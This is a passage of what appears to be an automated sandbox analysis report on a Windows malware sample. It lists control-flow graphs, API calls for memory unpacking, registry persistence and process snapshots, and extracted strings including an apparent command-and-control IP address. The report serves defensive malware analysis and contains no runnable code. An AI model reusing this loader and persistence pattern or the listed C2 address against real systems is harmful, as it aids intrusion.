30359->30358 30361 4950223 30360->30361 30362 4950d90 30361->30362 30363 4950dad 30362->30363 30364 4950dbb GetPEB 30363->30364 30365 4950238 VirtualAlloc 30363->30365 30364->30365 30365->30351
                                                    APIs
                                                    • GetTempPathA.KERNEL32(00000104,?,F7F2B484,75570F00,00000000), ref: 00403DAA
                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F39
                                                    • Sleep.KERNEL32(000003E8), ref: 00403F42
                                                    • __Init_thread_footer.LIBCMT ref: 00404517
                                                    • __Init_thread_footer.LIBCMT ref: 004046DD
                                                    • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 004048E7
                                                    • __Init_thread_footer.LIBCMT ref: 00404975
                                                    • __Init_thread_footer.LIBCMT ref: 00404BDE
                                                    • CoInitialize.OLE32(00000000), ref: 00404C5F
                                                    • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404C7A
                                                    • __Init_thread_footer.LIBCMT ref: 004050DD
                                                    • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                                                    • __Init_thread_footer.LIBCMT ref: 004053EB
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404CE8
                                                      • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,F7F2B484), ref: 00410837
                                                      • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                                                    • CoUninitialize.OLE32(?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71,?,?,?,?,00000000,0042D9A0), ref: 00404D21
                                                    • CoUninitialize.OLE32(?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404DE4
                                                    • CoUninitialize.OLE32(?,?,?,?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404E65
                                                    • __Init_thread_footer.LIBCMT ref: 00404046
                                                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                                                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                                                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                                                      • Part of subcall function 00402220: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402256
                                                      • Part of subcall function 00402220: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402277
                                                      • Part of subcall function 00402220: CloseHandle.KERNEL32(00000000), ref: 0040227E
                                                    • __Init_thread_footer.LIBCMT ref: 00404222
                                                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                                                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                                                    • String ID: 185.156.72.65$O@K\$SUB=$Y@BA$ZK\.$get$rmBK
                                                    • API String ID: 995133137-3578497191
                                                    • Opcode ID: 5147e2a1175d44933102eec1cbe4609f8cf95f651030e9d59c37e5d84c461d26
                                                    • Instruction ID: 6a8ba5f9be4b72ae1469cca8882757b6bc7ac7481bdf7cf44a4378d84f27710c
                                                    • Opcode Fuzzy Hash: 5147e2a1175d44933102eec1cbe4609f8cf95f651030e9d59c37e5d84c461d26
                                                    • Instruction Fuzzy Hash: 44F2DFB0E042549BDB24DF24DC48B9EBBB0EF45304F5442E9E5097B2D2DB78AA84CF59

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 498 404f70-405085 call 410822 call 4106e2 call 40b570 call 409b8a call 40b570 509 405090-40509b 498->509 510 4050e5-4050ec 509->510 511 40509d-4050b1 call 409cc5 509->511 512 40512d-405150 510->512 513 4050ee-405128 510->513 511->510 518 4050b3-4050e2 call 409fd7 call 409c7b 511->518 515 405153-405158 512->515 513->512 515->515 517 40515a-4051fc call 402760 call 409310 515->517 527 405211-40522c call 401e50 517->527 528 4051fe-405207 call 409a25 517->528 518->510 533 40525d-405285 527->533 534 40522e-40523d 527->534 528->527 537 4052b6-4052b8 533->537 538 405287-405296 533->538 535 405253-40525a call 409b7c 534->535 536 40523f-40524d 534->536 535->533 536->535 539 4058dd-405982 call 40cfef RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 536->539 543 4052f0-4052fb Sleep 537->543 544 4052ba-4052cd 537->544 541 405298-4052a6 538->541 542 4052ac-4052b3 call 409b7c 538->542 555 4059b0-4059c8 539->555 556 405984-405990 539->556 541->539 541->542 542->537 543->509 545 4052d0-4052d5 544->545 545->545 549 4052d7-4052e9 call 4024a0 545->549 549->543 559 4052eb-4052ee 549->559 557 4059f2-405a0a 555->557 558 4059ca-4059d6 555->558 560 405992-4059a0 556->560 561 4059a6-4059ad call 409b7c 556->561 566 405a34-405a41 call 409a17 557->566 567 405a0c-405a18 557->567 563 4059e8-4059ef call 409b7c 558->563 564 4059d8-4059e6 558->564 559->543 565 405300-405389 call 40b570 call 409b8a call 40b570 559->565 560->561 568 405a42-405a47 call 40cfef 560->568 561->555 563->557 564->563 564->568 586 405390-4053a2 565->586 572 405a2a-405a31 call 409b7c 567->572 573 405a1a-405a28 567->573 572->566 573->568 573->572 587 4053f3-4053fa 586->587 588 4053a4-4053b8 call 409cc5 586->588 590 4053fc-4053fe 587->590 591 40540d-405430 587->591 588->587 596 4053ba-4053f0 call 409fd7 call 409c7b 588->596 593 405400-40540b 590->593 594 405433-405438 591->594 593->591 593->593 594->594 595 40543a-4054dc call 402760 call 409310 594->595 605 4054f1-40550c call 401e50 595->605 606 4054de-4054e7 call 409a25 595->606 596->587 611 40553d-405565 605->611 612 40550e-40551d 605->612 606->605 613 405596-405598 611->613 614 405567-405576 611->614 615 405533-40553a call 409b7c 612->615 616 40551f-40552d 612->616 619 405693-40569c 613->619 620 40559e-4055a5 613->620 617 405578-405586 614->617 618 40558c-405593 call 409b7c 614->618 615->611 616->539 616->615 617->539 617->618 618->613 619->586 623 4056a2 619->623 620->619 624 4055ab-4055b3 620->624 627 405775-4057d9 call 409a25 * 3 CoUninitialize call 409a25 * 3 CoUninitialize 623->627 628 4055b9-4055bc 624->628 629 40568d 624->629 657 405807-40580d 627->657 658 4057db-4057e7 627->658 628->629 631 4055c2-4055ea call 40fb4d 628->631 629->619 637 4055f0-405602 call 40aff0 631->637 638 4055ec-4055ee 631->638 640 405605-40565c call 40fb4d call 408c80 call 4035d0 call 402ee0 637->640 638->640 640->629 664 40565e-405669 call 403430 640->664 662 40583b-405853 657->662 663 40580f-40581b 657->663 660 4057e9-4057f7 658->660 661 4057fd-405804 call 409b7c 658->661 660->539 660->661 661->657 669 405855-405861 662->669 670 40587d-405895 662->670 666 405831-405838 call 409b7c 663->666 667 40581d-40582b 663->667 664->629 683 40566b-405679 call 403430 664->683 666->662 667->539 667->666 671 405873-40587a call 409b7c 669->671 672 405863-405871 669->672 673 405897-4058a3 670->673 674 4058bf-4058dc call 409a17 670->674 671->670 672->539 672->671 679 4058b5-4058bc call 409b7c 673->679 680 4058a5-4058b3 673->680 674->539 679->674 680->539 680->679 683->629 690 40567b-40568b call 403430 683->690 690->629 693 4056a7-4056bc 690->693 694 4056c2-4056ef 693->694 696 4056f1-4056fd 694->696 697 405703-405706 694->697 696->697 698 405708-405715 697->698 699 40571b-40571e 697->699 698->699 700 405720-405723 699->700 701 40572d-405730 699->701 702 405732-405734 700->702 704 405725-40572b 700->704 701->702 703 40573b-405762 Sleep 701->703 702->703 705 405736-405739 702->705 703->694 706 405768 703->706 704->702 705->703 707 40576a-40576f Sleep 705->707 706->627 707->627
                                                    APIs
                                                      • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,F7F2B484), ref: 00410837
                                                      • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                                                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                                                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                                                    • __Init_thread_footer.LIBCMT ref: 004050DD
                                                    • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                                                    • __Init_thread_footer.LIBCMT ref: 004053EB
                                                    • Sleep.KERNEL32(000007D0), ref: 00405755
                                                    • Sleep.KERNEL32(000007D0), ref: 0040576F
                                                    • CoUninitialize.OLE32(?,?,0042DC19,?,?,?,?,?,?,?,?,?,?,00000000,0042DBDD), ref: 004057A5
                                                    • CoUninitialize.OLE32(?,?,?,?,?,0042DC19,?,?,?,?,?,?,?), ref: 004057D1
                                                    • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                                                    • Sleep.KERNELBASE(000003E8), ref: 00405AB0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                                                    • String ID: 185.156.72.65$185.156.72.65$185.156.72.65$@BAO$SUB=$get$mixone$updateSW$u%
                                                    • API String ID: 606935701-1501174972
                                                    • Opcode ID: bdb46772ab202cbb9d229e8d3a1254fe5b3d8fdd3be5b596ff9c74776f63cf58
                                                    • Instruction ID: 5b15cd53af07887682d130406d81e99ec93c25d434b47868d83c22c89ba1756f
                                                    • Opcode Fuzzy Hash: bdb46772ab202cbb9d229e8d3a1254fe5b3d8fdd3be5b596ff9c74776f63cf58
                                                    • Instruction Fuzzy Hash: BBD20271D001149BDB18EB24CD49BAEBB75AF01304F5441BEE8097B2D2DB78AE85CF99

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1314 47a8464-47a847d 1315 47a847f-47a8481 1314->1315 1316 47a8488-47a8494 CreateToolhelp32Snapshot 1315->1316 1317 47a8483 1315->1317 1318 47a8496-47a849c 1316->1318 1319 47a84a4-47a84b1 Module32First 1316->1319 1317->1316 1318->1319 1324 47a849e-47a84a2 1318->1324 1320 47a84ba-47a84c2 1319->1320 1321 47a84b3-47a84b4 call 47a8123 1319->1321 1325 47a84b9 1321->1325 1324->1315 1324->1319 1325->1320
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 047A848C
                                                    • Module32First.KERNEL32(00000000,00000224), ref: 047A84AC
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675534930.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3833638111-0
                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction ID: 5dc7c83e20f23cc8e33816e0c8d348b8f7c13a94c26d9eda38bb56e96fa06e4a
                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction Fuzzy Hash: 8DF09635100711AFE7203FF59C8CB6EB6E8BF89725F110728E642952C0DB74F8554AA2

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1330 4087e0-408807 call 402460 * 2 call 405a50 1336 40880c-408816 call 4106ab 1330->1336
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: mixtwo$nosub
                                                    • API String ID: 3472027048-187875987
                                                    • Opcode ID: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                                                    • Instruction ID: d051705d2d3a1196041d610bae506d61a1e8aa88cf060e84ab2565e50524cdd9
                                                    • Opcode Fuzzy Hash: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                                                    • Instruction Fuzzy Hash: AAD05286F0420822C00031BE2E0FA1C3A18064262EFA0122AE820226C3B8882A2489EF

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 708 495003c-4950047 709 495004c-4950263 call 4950a3f call 4950e0f call 4950d90 VirtualAlloc 708->709 710 4950049 708->710 726 4950265-4950289 call 4950a69 709->726 727 495028b-4950292 709->727 713 495004a 710->713 713->713 731 49502ce-49503c2 VirtualProtect call 4950cce call 4950ce7 726->731 729 49502a1-49502b0 727->729 730 49502b2-49502cc 729->730 729->731 730->729 738 49503d1-49503e0 731->738 739 49503e2-4950437 call 4950ce7 738->739 740 4950439-49504b8 VirtualFree 738->740 739->738 742 49505f4-49505fe 740->742 743 49504be-49504cd 740->743 744 4950604-495060d 742->744 745 495077f-4950789 742->745 747 49504d3-49504dd 743->747 744->745 748 4950613-4950637 744->748 750 49507a6-49507b0 745->750 751 495078b-49507a3 745->751 747->742 752 49504e3-4950505 LoadLibraryA 747->752 757 495063e-4950648 748->757 753 49507b6-49507cb 750->753 754 495086e-49508be LoadLibraryA 750->754 751->750 755 4950517-4950520 752->755 756 4950507-4950515 752->756 758 49507d2-49507d5 753->758 765 49508c7-49508f9 754->765 759 4950526-4950547 755->759 756->759 757->745 760 495064e-495065a 757->760 761 4950824-4950833 758->761 762 49507d7-49507e0 758->762 763 495054d-4950550 759->763 760->745 764 4950660-495066a 760->764 771 4950839-495083c 761->771 766 49507e4-4950822 762->766 767 49507e2 762->767 768 4950556-495056b 763->768 769 49505e0-49505ef 763->769 770 495067a-4950689 764->770 772 4950902-495091d 765->772 773 49508fb-4950901 765->773 766->758 767->761 774 495056d 768->774 775 495056f-495057a 768->775 769->747 776 4950750-495077a 770->776 777 495068f-49506b2 770->777 771->754 778 495083e-4950847 771->778 773->772 774->769 780 495057c-4950599 775->780 781 495059b-49505bb 775->781 776->757 782 49506b4-49506ed 777->782 783 49506ef-49506fc 777->783 784 4950849 778->784 785 495084b-495086c 778->785 792 49505bd-49505db 780->792 781->792 782->783 786 49506fe-4950748 783->786 787 495074b 783->787 784->754 785->771 786->787 787->770 792->763
                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0495024D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: cess$kernel32.dll
                                                    • API String ID: 4275171209-1230238691
                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction ID: e66cd634b46ade7cedf94661ff97dd16c42cd12a520f0e41bcf94499f40e58ad
                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction Fuzzy Hash: F2526D74A01229DFDB64CF58C985BACBBB5BF09304F1480E9E94DA7361DB30AA85DF14

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 793 405a50-405ad5 call 410822 call 4106e2 Sleep call 402760 799 405ada-406330 call 402760 call 403ab0 call 408ed0 call 408d80 * 3 call 406c40 call 408920 call 402460 call 408a70 call 402390 call 406ee0 call 4088e0 call 402460 call 408a70 call 402390 793->799 841 406404-40642f call 407290 call 4088e0 call 402460 call 408a70 call 402390 799->841 842 406336-4063ad call 406f60 call 4088e0 call 402460 call 4023e0 call 402390 call 406ff0 call 408900 call 402460 call 4023e0 call 402390 call 407070 call 408940 call 402460 call 408a70 call 402390 799->842 864 4064f3-40651e call 407630 call 4088c0 call 402460 call 408a70 call 402390 841->864 865 406435-4064ac call 407310 call 4088e0 call 402460 call 4023e0 call 402390 call 407390 call 408900 call 402460 call 4023e0 call 402390 call 407410 call 408940 call 402460 call 408a70 call 402390 841->865 935 4063cc-4063f7 call 407180 call 408940 call 402460 call 408a70 call 402390 842->935 936 4063af call 407100 842->936 898 406524-4065c1 call 4076b0 call 408920 call 402460 call 4023e0 call 402390 call 407730 call 408900 call 402460 call 4023e0 call 402390 call 4077b0 call 4088c0 call 402460 call 4023e0 call 402390 call 407830 call 4089c0 call 402460 call 408a70 call 402390 864->898 899 406608-406633 call 407a50 call 408890 call 402460 call 408a70 call 402390 864->899 1000 4064b8-4064e3 call 407520 call 408940 call 402460 call 408a70 call 402390 865->1000 1001 4064ae-4064b3 call 4074a0 865->1001 1128 4065c3-4065c8 call 4078c0 898->1128 1129 4065cd-4065f8 call 407940 call 4089c0 call 402460 call 408a70 call 402390 898->1129 943 4066b3-4066de call 407c70 call 408940 call 402460 call 408a70 call 402390 899->943 944 406635-4066ae call 407ae0 call 408900 call 402460 call 4023e0 call 402390 call 407b60 call 408940 call 402460 call 4023e0 call 402390 call 407bf0 call 4088c0 call 402460 call 4023e0 call 402390 899->944 996 40687d-4069df call 4017a0 call 4083f0 call 408940 call 402460 call 408370 call 408920 call 402460 call 4082d0 call 4089a0 call 402460 call 408da0 call 408e00 call 408eb0 call 408e00 call 408eb0 call 408e00 call 402390 * 8 935->996 997 4063fd-406402 call 407210 935->997 942 4063b4-4063c7 call 408920 call 402460 936->942 972 40686f-406878 call 4023e0 call 402390 942->972 1015 4066e0-406759 call 407d00 call 408900 call 402460 call 4023e0 call 402390 call 407d80 call 408920 call 402460 call 4023e0 call 402390 call 407e00 call 4088c0 call 402460 call 4023e0 call 402390 943->1015 1016 40675e-406789 call 407e80 call 408970 call 402460 call 408a70 call 402390 943->1016 944->996 972->996 1231 4069e5-4069fe call 402350 call 4021d0 996->1231 997->942 1000->996 1071 4064e9-4064ee call 4075b0 1000->1071 1001->942 1015->996 1079 40678b-4067dc call 407f10 call 408900 call 402460 call 4023e0 call 402390 call 407fd0 call 4088c0 call 402460 call 4023e0 call 402390 call 408050 1016->1079 1080 4067de-406809 call 4080d0 call 4088c0 call 402460 call 408a70 call 402390 1016->1080 1071->864 1204 40685c-40686c call 4088c0 call 402460 1079->1204 1080->996 1148 40680b-406857 call 408150 call 408900 call 402460 call 4023e0 call 402390 call 4081d0 call 408920 call 402460 call 4023e0 call 402390 call 408250 1080->1148 1128->1129 1129->996 1187 4065fe-406603 call 4079d0 1129->1187 1148->1204 1187->899 1204->972 1236 406a00-406a23 call 402210 call 402460 call 4025e0 1231->1236 1237 406a3e-406a45 Sleep 1231->1237 1236->1237 1244 406a47-406a9c call 402390 call 408c80 * 3 call 404f70 1236->1244 1237->1231
                                                    APIs
                                                      • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,F7F2B484), ref: 00410837
                                                      • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                                                    • Sleep.KERNELBASE(000003E8), ref: 00405AB0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: 185.156.72.65$185.156.72.65$SUB=$get$u%
                                                    • API String ID: 2563648476-311857291
                                                    • Opcode ID: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                                                    • Instruction ID: 73809eb16a5d3869ae15fb7337a890a5b139b8f1a0f0395b135ebc5315de088a
                                                    • Opcode Fuzzy Hash: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                                                    • Instruction Fuzzy Hash: 03326571D001189ACB19FB76C95AAEE73785F14308F10817FF846771D2EE7C6A48CAA9

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1254 5fac78-5face2 1256 5fad0b-5fad26 RegOpenKeyA 1254->1256 1257 5face4-5facff RegOpenKeyA 1254->1257 1259 5fad3e-5fad6a 1256->1259 1260 5fad28-5fad32 1256->1260 1257->1256 1258 5fad01 1257->1258 1258->1256 1263 5fad6c-5fad75 GetNativeSystemInfo 1259->1263 1264 5fad77-5fad81 1259->1264 1260->1259 1263->1264 1265 5fad8d-5fad9b 1264->1265 1266 5fad83 1264->1266 1268 5fad9d 1265->1268 1269 5fada7-5fadae 1265->1269 1266->1265 1268->1269 1270 5fadb4-5fadbb 1269->1270 1271 5fadc1-5fe794 1269->1271 1270->1271
                                                    APIs
                                                    • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 005FACF7
                                                    • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 005FAD1E
                                                    • GetNativeSystemInfo.KERNELBASE(?), ref: 005FAD75
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2673000317.00000000005F5000.00000040.00000001.01000000.0000000A.sdmp, Offset: 005F5000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_5f5000_607f096cd3.jbxd
                                                    Similarity
                                                    • API ID: Open$InfoNativeSystem
                                                    • String ID:
                                                    • API String ID: 1247124224-0
                                                    • Opcode ID: 96b13db159a9f038ba2ffaa9f7796a66699114326e64ce04a8544a8021075171
                                                    • Instruction ID: ba9fcb3b38bb949566351807e0d017da6f4a7ac9ea480b25569d3ffe1aec6860
                                                    • Opcode Fuzzy Hash: 96b13db159a9f038ba2ffaa9f7796a66699114326e64ce04a8544a8021075171
                                                    • Instruction Fuzzy Hash: 98416DB110425E9FDF11DF60C849AEE7BE8FF05305F01082AE986D2951D77A4DA4CF5A

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1274 5fac45-5fac46 1275 5fac48-5fc387 1274->1275 1276 5faca0-5face2 1274->1276 1281 5fe4bd-5fe794 1275->1281 1279 5fad0b-5fad26 RegOpenKeyA 1276->1279 1280 5face4-5facff RegOpenKeyA 1276->1280 1284 5fad3e-5fad6a 1279->1284 1285 5fad28-5fad32 1279->1285 1280->1279 1283 5fad01 1280->1283 1283->1279 1288 5fad6c-5fad75 GetNativeSystemInfo 1284->1288 1289 5fad77-5fad81 1284->1289 1285->1284 1288->1289 1290 5fad8d-5fad9b 1289->1290 1291 5fad83 1289->1291 1293 5fad9d 1290->1293 1294 5fada7-5fadae 1290->1294 1291->1290 1293->1294 1295 5fadb4-5fadbb 1294->1295 1296 5fadc1 1294->1296 1295->1296 1296->1281
                                                    APIs
                                                    • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 005FACF7
                                                    • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 005FAD1E
                                                    • GetNativeSystemInfo.KERNELBASE(?), ref: 005FAD75
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2673000317.00000000005F5000.00000040.00000001.01000000.0000000A.sdmp, Offset: 005F5000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_5f5000_607f096cd3.jbxd
                                                    Similarity
                                                    • API ID: Open$InfoNativeSystem
                                                    • String ID:
                                                    • API String ID: 1247124224-0
                                                    • Opcode ID: 1aabeb2f78323eda14135ecafda1cc648f48057c7c6cd3d9ffeda3407e148843
                                                    • Instruction ID: 07d29db0af84f6dea6f45c717714646bb73e9c9654e87b803cfcc43274253964
                                                    • Opcode Fuzzy Hash: 1aabeb2f78323eda14135ecafda1cc648f48057c7c6cd3d9ffeda3407e148843
                                                    • Instruction Fuzzy Hash: 43316FB110424EDFDB11DF10C849AEF3BE8FF15305F11082AEA86D2950DB7A4DA4CB5A

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1297 7043f4-7043f7 1298 7043fa-704424 1297->1298 1299 7043ad-7043db VirtualProtect call 7043e3 1297->1299 1302 70442a-70443a call 70443d 1298->1302 1303 70458f-70459d 1298->1303 1306 7043e0 1299->1306 1302->1303 1307 7045a3-7045a4 1303->1307 1308 7045a5 1303->1308 1307->1308 1310 7045ab-7045ac 1308->1310 1311 7045ad-7045c3 call 7045c6 1308->1311 1310->1311
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(?,4D4005D1), ref: 007043B9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2673000317.0000000000703000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00703000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_703000_607f096cd3.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID: Z6cG
                                                    • API String ID: 544645111-58344879
                                                    • Opcode ID: 119838194a7b058a20593de827de62110e61b514fd04f874dff56af14f722064
                                                    • Instruction ID: 839175943775d10c6ee4e127bd5fde2bd0a66e2831efbe2dee9efa1f56ec778d
                                                    • Opcode Fuzzy Hash: 119838194a7b058a20593de827de62110e61b514fd04f874dff56af14f722064
                                                    • Instruction Fuzzy Hash: 6A1144F294420EEFE7119F14CC44BEE77E6EF56320F244728EA0097AC6D6B95C248B18

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1327 4950e0f-4950e24 SetErrorMode * 2 1328 4950e26 1327->1328 1329 4950e2b-4950e2c 1327->1329 1328->1329
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00000400,?,?,04950223,?,?), ref: 04950E19
                                                    • SetErrorMode.KERNELBASE(00000000,?,?,04950223,?,?), ref: 04950E1E
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction ID: 43bafc9d913032364e66eb76556220aff11c3ffb76751d3d3a00cc89f2821bfa
                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction Fuzzy Hash: 3ED0123114512877D7002A94DC0DBCD7B1CDF05B62F108021FB0DD9080C770954047E5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1339 70433e-704340 1340 704342-704386 1339->1340 1341 704338-70433d 1339->1341 1345 704392-7043e0 VirtualProtect call 7043e3 1340->1345 1346 70438c 1340->1346 1346->1345
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(?,4D4005D1), ref: 007043B9
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2673000317.0000000000703000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00703000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_703000_607f096cd3.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
